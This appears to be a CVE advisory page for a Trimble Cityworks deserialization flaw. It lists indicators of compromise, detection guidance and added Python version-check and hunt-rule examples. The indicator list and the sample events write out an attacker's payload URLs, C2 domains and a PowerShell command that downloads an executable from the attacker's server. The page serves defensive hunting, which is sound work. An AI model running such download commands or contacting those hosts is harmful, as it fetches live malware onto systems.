cbcvebase.
CVE-2025-0994
published 2025-02-06


Priority: P1 (90), high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
KEV: listed in the CISA Known Exploited Vulnerabilities catalog, remediation due 2025-02-28
ITW: exploited in the wild
EPSS: 27.43% (97.8th percentile)
Trimble Cityworks versions prior to 15.8.9 and Cityworks with office companion versions prior to 23.10 are vulnerable to a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer’s Microsoft Internet Information Services (IIS) web server.

Affected

3 ranges

Vendor    Product     Version range      Fixed in
trimble   cityworks   < 23.10            23.10
trimble   cityworks   < 15.8.9           15.8.9
trimble   cityworks   >= 23.0 < 23.10    23.10

Note that the first range (< 23.10) as listed would also cover the 15.x branch; per the description, 15.x installs are fixed in 15.8.9 and the 23.x (office companion) branch in 23.10.
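To turn the ranges above into an inventory check, here is an added example (mine, not code from the page or from Trimble) that classifies a Cityworks version string against the two fixed branches. It assumes numeric dotted version strings and, because the page states no fix for branches other than 15.x and 23.x, reports those as unknown rather than guessing; the `triage` helper and its sample inventory are constructed for illustration.

```python
"""Classify a Cityworks version string against the fixed versions on the page.

Added example, not from the page or from Trimble. Assumptions: versions are
numeric dotted strings; the 15.x and 23.x branches are fixed in 15.8.9 and
23.10 respectively; any other major version is reported as 'unknown' because
the page states no fix for it.
"""
from typing import Dict, Tuple

FIXED_IN = {15: (15, 8, 9), 23: (23, 10)}  # branch -> first fixed version


def parse_version(text: str) -> Tuple[int, ...]:
    """'15.8.9' -> (15, 8, 9); raises ValueError on non-numeric parts."""
    return tuple(int(part) for part in text.strip().split("."))


def cityworks_status(version: str) -> str:
    """'vulnerable', 'fixed' or 'unknown' for one installed version."""
    parsed = parse_version(version)
    fixed = FIXED_IN.get(parsed[0])
    if fixed is None:
        return "unknown"
    # Tuple comparison is numeric per component, so 23.9 < 23.10 and a
    # shorter prefix such as (15, 8) sorts before (15, 8, 9).
    return "vulnerable" if parsed < fixed else "fixed"


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map host -> status for a {host: version} inventory (constructed input)."""
    return {host: cityworks_status(ver) for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = {"gis-app-01": "15.8.8", "gis-app-02": "15.8.9",
              "cw-23-01": "23.9", "cw-23-02": "23.10", "legacy-01": "16.2"}
    for host, status in triage(sample).items():
        print(host, status)
```

String comparison would get 23.9 vs 23.10 wrong ("23.9" > "23.10" lexically), which is why the check parses into integer tuples first.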

Detection & IOCs (extracted from sources)

ip: 192.210.239.172
port: 3219
filename: LVLWPH.exe
filename: MCUCAT.exe
filename: TJPLYT.exe
filename: z44.exe
domain: cdn.lgaircon.xyz
domain: lgaircon.xyz
url: http://192.210.239.172:3219/LVLWPH.exe
url: http://192.210.239.172:3219/MCUCAT.exe
url: http://192.210.239.172:3219/TJPLYT.exe
url: http://192.210.239.172:3219/z44.exe
url: cdn.lgaircon.xyz/jquery-3.3.1.min.js
url: cdn.lgaircon.xyz/jquery-3.3.2.min.js
url: lgaircon.xyz/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2
url: lgaircon.xyz/owa/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG
other: Cobalt Strike watermark 987654321
path: c:\inetpub\wwwroot\CityworksServer\WebSite\Assets
path: c:\inetpub\wwwroot\CityworksServer\Uploads\
process: %windir%\syswow64\dllhost.exe
process: %windir%\sysnative\dllhost.exe
process: %windir%\syswow64\gpupdate.exe
process: %windir%\sysnative\gpupdate.exe
command: cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite
  • Detect web shell deployment (AntSword, chinatso/Chopper, Behinder) under the Cityworks IIS web root paths, particularly c:\inetpub\wwwroot\CityworksServer\.
  • Hunt for Cobalt Strike beacons with Watermark 987654321 and C2 domain lgaircon.xyz; both beacon configs share this watermark value.
  • Detect Cobalt Strike beacon traffic to lgaircon.xyz mimicking OWA paths (/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2 and /owa/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG) with a fake Microsoft telemetry cookie header.
  • Alert on PowerShell Invoke-WebRequest calls from IIS worker processes downloading executables from 192.210.239.172 on port 3219 to C:\windows\temp\.
  • TetraLoader (Rust-based) injects shellcode into notepad.exe; monitor for notepad.exe spawned by non-interactive parent processes or with injected remote threads.
  • Monitor for Cobalt Strike spawn-to processes dllhost.exe and gpupdate.exe being used as injection targets (x86: syswow64, x64: sysnative), which are non-default spawn-to values indicating custom beacon profiles.
  • Detect staging of files from the Cityworks web root into the Uploads subdirectory, which UAT-6382 used to pre-position data for exfiltration.
  • The Cobalt Strike beacon C2 URI paths for the second beacon config (/owa/...) mimic legitimate Microsoft OWA endpoints; defenders should not allowlist OWA-like URIs to lgaircon.xyz.
  • Trimble warns that some on-premises Cityworks deployments run IIS under an overprivileged identity; IIS should not run with local or domain-level administrative privileges, since that amplifies the impact of a post-authentication RCE such as this one.
  • Some Cityworks deployments have incorrect attachment directory configurations; the vendor recommends restricting attachment root folders to contain only attachments, which limits where a post-exploitation web shell can be placed.
  • TetraLoader is built with the publicly available MaLoader framework (appeared on GitHub December 2024); signatures for TetraLoader may need to account for the multiple encoding/encryption options MaLoader supports.
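The bullets above describe the intrusion chain as a set of detection conditions. The following added example (mine, not code from the page or from any vendor) encodes them as rules over Sysmon-style process, file and network events and runs them across a constructed sample of the observed chain plus two benign events. The event field names (`type`, `image`, `parent`, `cmdline`, `target`, `host`, `dst_ip`, `dst_port`, `uri`), the ASP.NET extensions treated as web shells, the benign-parent allowlist, the /owa/ token regex and the sample file names such as ant.aspx are assumptions; the IP, port, domain, paths, URIs and spawn-to processes are the IOCs listed on the page.

```python
"""Hunt rules for the UAT-6382 / CVE-2025-0994 post-exploitation chain.

Added example, not code from the page or any vendor. Events are plain dicts
standing in for Sysmon process-create (1), network (3) and file-create (11)
events; the field names are an assumption, adapt them to your pipeline.
"""
import re
from typing import Dict, Iterable, List, Tuple

# IOCs from the page
C2_HOSTS = {"lgaircon.xyz", "cdn.lgaircon.xyz"}
STAGER_IP, STAGER_PORT = "192.210.239.172", 3219
WEBROOT = "c:\\inetpub\\wwwroot\\cityworksserver\\"
SPAWN_TARGETS = {"dllhost.exe", "gpupdate.exe", "notepad.exe"}
IIS_WORKER = "w3wp.exe"
# Assumptions: ASP.NET handler types a web shell would use, parents that
# legitimately launch notepad/dllhost/gpupdate, and the shape of the /owa/ tokens
WEBSHELL_EXT = (".aspx", ".ashx", ".asmx", ".asax", ".soap")
BENIGN_PARENTS = {"explorer.exe", "services.exe", "svchost.exe"}
OWA_TOKEN = re.compile(r"^/owa/[A-Za-z0-9_-]{30,}$")


def _low(s) -> str:
    return (s or "").lower()


def _base(path) -> str:
    """Lower-cased file name of a Windows path."""
    return _low(path).replace("/", "\\").rsplit("\\", 1)[-1]


def check_process(ev: Dict) -> List[str]:
    image, parent = _base(ev.get("image")), _base(ev.get("parent"))
    cmd, hits = _low(ev.get("cmdline")), []
    if parent == IIS_WORKER and image in {"cmd.exe", "powershell.exe"}:
        hits.append("iis-worker-spawned-shell")      # web shell command execution
    if "invoke-webrequest" in cmd and f"{STAGER_IP}:{STAGER_PORT}" in cmd:
        hits.append("stager-download-from-c2")       # PowerShell pull of the loaders
    if image in SPAWN_TARGETS and parent not in BENIGN_PARENTS:
        hits.append("beacon-spawnto-target")         # TetraLoader -> notepad, beacon spawn-to
    return hits


def check_file(ev: Dict) -> List[str]:
    target, hits = _low(ev.get("target")), []
    if target.startswith(WEBROOT):
        if target.endswith(WEBSHELL_EXT):
            hits.append("webshell-dropped-in-webroot")
        if "\\uploads\\" in target:
            hits.append("staging-in-uploads")        # pre-positioning for exfiltration
    if target.startswith("c:\\windows\\temp\\") and target.endswith(".exe"):
        hits.append("exe-written-to-windows-temp")
    return hits


def check_network(ev: Dict) -> List[str]:
    hits = []
    if _low(ev.get("host")) in C2_HOSTS:
        hits.append("c2-domain")
        if OWA_TOKEN.match(ev.get("uri", "")):
            hits.append("owa-lookalike-beacon-uri")
    if ev.get("dst_ip") == STAGER_IP and ev.get("dst_port") == STAGER_PORT:
        hits.append("stager-ip-port")
    return hits


CHECKS = {"process": check_process, "file": check_file, "network": check_network}


def hunt(events: Iterable[Dict]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every rule each event trips."""
    return [(i, rule) for i, ev in enumerate(events) for rule in CHECKS[ev["type"]](ev)]


W3WP = "C:\\Windows\\System32\\inetsrv\\w3wp.exe"
SAMPLE_EVENTS = [  # constructed to mirror the chain on the page, plus two benign events
    {"type": "process", "image": "C:\\Windows\\System32\\cmd.exe", "parent": W3WP,
     "cmdline": "cmd.exe /c dir c:\\inetpub\\wwwroot\\CityworksServer\\WebSite"},
    {"type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": W3WP, "cmdline": "powershell -c Invoke-WebRequest http://192.210.239.172:3219/z44.exe "
                               "-OutFile C:\\windows\\temp\\z44.exe"},
    {"type": "file", "target": "C:\\windows\\temp\\z44.exe"},
    {"type": "file", "target": "C:\\inetpub\\wwwroot\\CityworksServer\\WebSite\\Assets\\ant.aspx"},
    {"type": "file", "target": "C:\\inetpub\\wwwroot\\CityworksServer\\Uploads\\export.zip"},
    {"type": "process", "image": "C:\\Windows\\System32\\notepad.exe",
     "parent": "C:\\windows\\temp\\z44.exe", "cmdline": "notepad.exe"},
    {"type": "process", "image": "C:\\Windows\\SysWOW64\\dllhost.exe",
     "parent": "C:\\Windows\\System32\\notepad.exe", "cmdline": "dllhost.exe"},
    {"type": "network", "host": "lgaircon.xyz", "dst_port": 443,
     "uri": "/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2"},
    {"type": "network", "host": "", "dst_ip": STAGER_IP, "dst_port": STAGER_PORT, "uri": "/z44.exe"},
    {"type": "process", "image": "C:\\Windows\\System32\\notepad.exe",
     "parent": "C:\\Windows\\explorer.exe", "cmdline": "notepad.exe"},          # benign
    {"type": "file", "target": "C:\\inetpub\\wwwroot\\CityworksServer\\WebSite\\Assets\\logo.png"},  # benign
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The spawn-to rule deliberately keys on the parent rather than the image path, because the page's point is that dllhost.exe and gpupdate.exe are legitimate binaries that only become suspicious when something non-interactive starts them; tune `BENIGN_PARENTS` to what actually launches them in your environment before alerting on it.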

CVSS provenance

NVD (v3.1): 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
NVD (v4.0): 8.6 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
VulnCheck: 8.6 HIGH
CISA: 8.6 HIGH

The two NVD vectors disagree on privileges required (PR:L in v3.1, PR:H in v4.0); the description itself only says "an authenticated user", so treat any authenticated Cityworks account as sufficient when prioritizing.